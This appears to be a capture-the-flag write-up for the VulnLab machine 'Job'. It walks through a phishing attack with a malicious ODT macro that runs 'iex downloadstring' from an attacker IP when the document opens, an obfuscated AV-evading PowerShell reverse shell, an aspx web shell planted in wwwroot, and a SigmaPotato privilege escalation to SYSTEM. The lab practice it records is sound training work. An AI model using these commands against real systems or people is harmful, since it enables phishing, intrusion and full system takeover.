Post

Job Writeup (VulnLab)

A medium rated box on vulnlab, using phishing for initial access, lateral movement and windows privilege exploitation.

Job Writeup (VulnLab)

NMAP Port Scan

A basic TCP port scan was done with NMAP to enumerate running services on the machine:

1
sudo nmap -sS -sV -A -p- 10.10.86.141 -oA nmap

The NMAP Output revealed that port 25,80,445 and 3389 were running: NMAP Scan Result

Discovery of an email address

In the previous NMAP scan, port 80 revealed that the http title was ‘Job.local’. The address was subsequently added to the /etc/hosts file:

1
sudo nano /etc/hosts

Hosts File

Browsing to the HTTP server hosted, the index.html file revealed interesting information: HTTP Page1 The webpage states an email address ‘career@job.local’ while hinting at a potential phishing attack vector using libre office.

Creating a malicious ODT file

First, I opened libreoffice and pasted Lorem Ipsum in there so the document wasn’t empty: Lorem Ipsum

Browse to tools->macros->organize macro’s->basic & create a new macro filename.odt->standard->new Macros Macro2

The following code was embedded into the macro to download and execute the reverse shell:

1
2
3
4
5
REM  *****  BASIC  *****

Sub Main
	Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.8.4.194/security.ps1')""")
End Sub

(NOTE: security.ps1 will be made in the next section). It is important that the macro is immediately trigged, to achieve that we can add it to trigger when the document is opened tools->macros->organize macros->basic->select the created macro->assign->events->open document: Macro3

Save the file and we will be ready to move onto creating an obfuscated reverse shell.

Creating an obfuscated reverse shell

To ensure there was no hiccups with antivirus or AMSI, I utilised Get-ReverseShell which is an excellent tool for creating obfuscated powershell payloads. This was used to generate our payload to eventually be downloaded when the malicious ODT file will be opened:

1
2
3
git clone https://github.com/gh0x0st/Get-ReverseShell
pwsh
Get-ReverseShell -Ip 10.8.4.194 -Port 53 > security.ps1

Catching a shell as jack.black

A python3 http.sever must be setup to recieve download requests (same folder as malicious document):

1
python3 -m http.server 80

Now an NC Listener can be setup on the port chosen for the reverse shell, in this instance it was port 53:

1
nc -lvnp 53

Finally, we can send our document to the discovered email address using ‘sendemail’:

1
2
3
4
5
6
sendemail -s "job.local" \
-f "ross@job.local" \
-t "career@job.local" \
-o tls=no \
-m "Hi, I've attached my CV to the email. Please open it immediately" \
-a me.odt    

A short while later, our reverse shell file was downloaded from the web server and the shell was triggered on the machine: Shell

Switching to IIS Apppool

Viewing inetpub/wwwroot and checking if it was writable to potentially move into IIS Apppool

1
Get-Acl "C:\inetpub\wwwroot" | Format-List

The output shows that it is writable and it contains a hello.aspx file. inetpub inetpub2

SharPyShell is a repository containing a script that can generate and interact with an obfuscated aspx file, we can use this to generate a file that can be later interacted with:

1
python3 SharPyShell.py generate -p somepassword

Now we can upload the aspx file to the machine via powershell after starting another python3 web server on the attacker machine:

1
python3 -m http.server 80
1
(New-Object Net.WebClient).DownloadFile('http://10.8.4.194:80/shell.aspx','C:\inetpub\wwwroot\shell.aspx')

inetpub3

Following from the shell upload, we can interact with it via sharpyshell again to gain a HTTP interactive shell as IIS Apppool.

1
python3 SharPyShell.py interact -u http://job.local/shell.aspx -p somepassword

inetpub4

Abusing windows privileges to admin

Viewing account privileges on the apppool showed that SeImpersonatePrivilege was available:

1
whoami /priv

privesc1

From here gaining administrator privileges was relatively simple, we can use a potato exploit. In this instance I opted to use SigmaPotato https://github.com/tylerdotrar/SigmaPotato, to use this transfer it from the attacker machine to the host machine using sharpy’s webshell.

1
#upload /opt/PrivEsc/Windows/Exploits/Potato/SigmaPotato.exe

Then execute sigmapotato connecting to your setup nc listener:

1
SigmaPotato.exe --revshell 10.8.4.194 443

We eventually receive a callback on the shell as NT authority\system. pwned PWNED!

This post is licensed under CC BY 4.0 by the author.